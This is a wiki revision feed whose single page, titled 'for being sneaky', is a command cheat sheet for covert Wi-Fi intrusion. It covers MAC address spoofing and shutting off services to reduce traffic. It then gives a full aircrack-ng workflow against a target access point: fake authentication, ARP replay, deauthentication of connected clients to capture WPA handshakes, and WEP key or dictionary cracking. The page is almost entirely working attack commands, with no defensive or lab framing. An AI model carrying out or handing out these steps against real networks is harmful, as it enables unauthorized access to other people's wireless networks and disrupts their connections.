<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
		<id>https://beardedmaker.com/wiki/index.php?action=history&amp;feed=atom&amp;title=Linux_Network_Config_%28for_being_sneaky%29</id>
		<title>Linux Network Config (for being sneaky) - Revision history</title>
		<link rel="self" type="application/atom+xml" href="https://beardedmaker.com/wiki/index.php?action=history&amp;feed=atom&amp;title=Linux_Network_Config_%28for_being_sneaky%29"/>
		<link rel="alternate" type="text/html" href="https://beardedmaker.com/wiki/index.php?title=Linux_Network_Config_(for_being_sneaky)&amp;action=history"/>
		<updated>2026-04-26T23:46:14Z</updated>
		<subtitle>Revision history for this page on the wiki</subtitle>
		<generator>MediaWiki 1.27.4</generator>

	<entry>
		<id>https://beardedmaker.com/wiki/index.php?title=Linux_Network_Config_(for_being_sneaky)&amp;diff=2724&amp;oldid=prev</id>
		<title>Beard at 19:19, 28 June 2018</title>
		<link rel="alternate" type="text/html" href="https://beardedmaker.com/wiki/index.php?title=Linux_Network_Config_(for_being_sneaky)&amp;diff=2724&amp;oldid=prev"/>
				<updated>2018-06-28T19:19:40Z</updated>
		
		<summary type="html">&lt;p&gt;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;&amp;lt;pre&amp;gt;&lt;br /&gt;
exit #TO PREVENT EXECUTION OF THIS FILE&lt;br /&gt;
&lt;br /&gt;
ifconfig wlan0 down&lt;br /&gt;
ifconfig wlan0 hw ether 00:11:22:33:44:55&lt;br /&gt;
ifconfig wlan0 up&lt;br /&gt;
&lt;br /&gt;
macchanger -A wlan0 - set random vendor MAC&lt;br /&gt;
	-a - another random vendor MAC&lt;br /&gt;
	-r - random MAC&lt;br /&gt;
	-p - reset to original MAC&lt;br /&gt;
	-m xx:xx:xx:xx:xx:xx - set MAC&lt;br /&gt;
	-l - list known vendors&lt;br /&gt;
	-s - show current MAC&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
daemons to shut off:&lt;br /&gt;
	smbd&lt;br /&gt;
	nmbd&lt;br /&gt;
	clamav-freshclam&lt;br /&gt;
	network-manager&lt;br /&gt;
	unattended-upgrades&lt;br /&gt;
		&lt;br /&gt;
	(packet sniff to find out if anything else is generating traffic from you machine)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
promiscuous mode:&lt;br /&gt;
	ifconfig wlan0 promisc&lt;br /&gt;
remove:&lt;br /&gt;
	ifconfig wlan0 -promisc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
monitor mode:&lt;br /&gt;
	ifconfig wlan0 down&lt;br /&gt;
	iwconfig wlan0 mode monitor&lt;br /&gt;
	ifconfig wlan0 up&lt;br /&gt;
&lt;br /&gt;
	ifconfig wlan0 down&lt;br /&gt;
	iwconfig wlan0 mode managed&lt;br /&gt;
	ifconfig wlan0 up&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
ifconfig wlan0 192.168.1.1 netmask 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
	this does not always work, for instance with a wireless card using ndiswrapper&lt;br /&gt;
	you need to change your .conf file withing your driver's folder located in&lt;br /&gt;
	/etc/ndiswrapper/&lt;br /&gt;
&lt;br /&gt;
	which reportedly works, you simply change the line mac_address|XX:XX:XX:XX:XX:XX&lt;br /&gt;
	to mac_address|&lt;br /&gt;
&lt;br /&gt;
	I do not currently have that working on gentoo linux at the moment however&lt;br /&gt;
	it's worked for a couple people out there and it -is- the method listed for the wiki.&lt;br /&gt;
	simply bringing the wlan0 down and ifconfig wlan0 hw ether &lt;br /&gt;
	does not work with my gentoo build using ndiswrapper it seems to be overwritten w/ the &lt;br /&gt;
	real mac address repeatedly.&lt;br /&gt;
&lt;br /&gt;
/etc/sysconfig/network-scripts/ifcfg - interface configurations&lt;br /&gt;
&lt;br /&gt;
service network restart - self explanitory&lt;br /&gt;
service networking restart - self explanitory&lt;br /&gt;
&lt;br /&gt;
dhcpcd wlan0 - set wlan0 to dhcp&lt;br /&gt;
dhclient -4 -s 11.22.33.44 wlan0 - set interface to dhcp (ip4) from dhcp server 11.22.33.44&lt;br /&gt;
&lt;br /&gt;
################ WEP/WPA ###################&lt;br /&gt;
&lt;br /&gt;
SPOOF&lt;br /&gt;
spoof wlan0 and mon0&lt;br /&gt;
&lt;br /&gt;
INTERFACE&lt;br /&gt;
airmon-ng start wlan0 - creates new interface called mon0 that can monitor and inject&lt;br /&gt;
airmon-ng stop mon0 - removes mon0&lt;br /&gt;
&lt;br /&gt;
MONITOR&lt;br /&gt;
airodump-ng mon0 - monitors all channels&lt;br /&gt;
	channels 1 -14 used for 802.11b &amp;amp; g. &lt;br /&gt;
	channels 36-149 used for 802.11a.&lt;br /&gt;
	MB = speed. 11 is 802.11b and 54 is 802.11g&lt;br /&gt;
&lt;br /&gt;
PACKETS&lt;br /&gt;
every packet contains initialization vector (IV). # of IVs captured are under #Data.&lt;br /&gt;
	PTW cracking:00:17:3F:BD:4F:E2&lt;br /&gt;
		64 bit  - capture 10k IVs.&lt;br /&gt;
		128 bit - capture 500k IVs.&lt;br /&gt;
	FMS/Korek cracking:&lt;br /&gt;
		64 bit  - capture 250k IVs.&lt;br /&gt;
		128 bit - capture 1.5m IVs.&lt;br /&gt;
&lt;br /&gt;
TEST INJECTION&lt;br /&gt;
aireplay-ng -9 -e ssid -a 00:00:00:00:00:00 mon0&lt;br /&gt;
	-9 - test&lt;br /&gt;
	-e essid name&lt;br /&gt;
	-a AP address&lt;br /&gt;
&lt;br /&gt;
ATTACK/INJECTION TEST&lt;br /&gt;
aireplay-ng -9 mon0&lt;br /&gt;
	-i wlan1 - mimics an AP to produce different results&lt;br /&gt;
&lt;br /&gt;
CAPTURE&lt;br /&gt;
airodump-ng -c 11 -d 00:00:00:00:00:00 -w dump mon0&lt;br /&gt;
	-d - bssid of target&lt;br /&gt;
	listens to channel 11 on access point with bssid and dumps in file called &amp;quot;dump&amp;quot;.&lt;br /&gt;
	channel is optional.&lt;br /&gt;
&lt;br /&gt;
PRODUCE IVs (FAKE AUTHENTICATION)&lt;br /&gt;
aireplay-ng -1 0 -e ssid -a 00:00:00:00:00:00 -h 11:11:11:11:11:11 mon0&lt;br /&gt;
produces a lot of arp requests and traffic. Noticable. &lt;br /&gt;
	-1 - fake authentication (delay = 0)&lt;br /&gt;
	-a - bssid&lt;br /&gt;
	-h - your mac address&lt;br /&gt;
if doesn't work, try -1 6000 -o 1 -q10&lt;br /&gt;
also put it in a loop (about 2.5 sec)&lt;br /&gt;
may also produce handshake&lt;br /&gt;
&lt;br /&gt;
PRODUCE TRAFFIC&lt;br /&gt;
while running airodump-ng...&lt;br /&gt;
aireplay-ng --arpreplay -b 00:00:00:00:00:00 -h 11:11:11:11:11:11 mon0&lt;br /&gt;
	-b - bssid of AP&lt;br /&gt;
	-h - your mac address&lt;br /&gt;
if packets stop flowing, reduce the replay speed wih -x &amp;lt;packets/sec&amp;gt;. default 50.&lt;br /&gt;
also, try generating ARP by pinging non existant ip address.&lt;br /&gt;
&lt;br /&gt;
DISCONNECT PACKET FOR WPA HANDSHAKE&lt;br /&gt;
while running airodump-ng...&lt;br /&gt;
aireplay-ng -0 1 -a 00:00:00:00:00:00 -c 11:11:11:11:11:11 mon0&lt;br /&gt;
	-0 - deauth (followed by number of deauths to send)&lt;br /&gt;
	-a bssid of AP&lt;br /&gt;
	-c host to disconnect&lt;br /&gt;
&lt;br /&gt;
CRACKING&lt;br /&gt;
aircrack-ng -b 00:00:00:00:00:00 dump*.cap&lt;br /&gt;
	-b bssid of AP (optional if capture was from only one AP)&lt;br /&gt;
	capture file (put * to use all capture files)&lt;br /&gt;
	-n - 64 or 128 bit key&lt;br /&gt;
	-K alternative parameter (FMS/Korek method)&lt;br /&gt;
	default method is PTW&lt;br /&gt;
&lt;br /&gt;
FOR WPA/WPA2&lt;br /&gt;
run aircrack-ng with &amp;quot;-w word.lst&amp;quot; to brute force using a dictionary called word.lst.&lt;br /&gt;
aircrack-ng comes with a default list located in /usr/share/doc/aircrack-ng/examples/password.lst.gz.	&lt;br /&gt;
&lt;br /&gt;
CHANNEL&lt;br /&gt;
if having trouble with interface being in a fixed channel:&lt;br /&gt;
	ifconfig wlan0 down&lt;br /&gt;
	iwconfig wlan0 mode monitor&lt;br /&gt;
	ifconfig wlan0 up&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Beard</name></author>	</entry>

	</feed>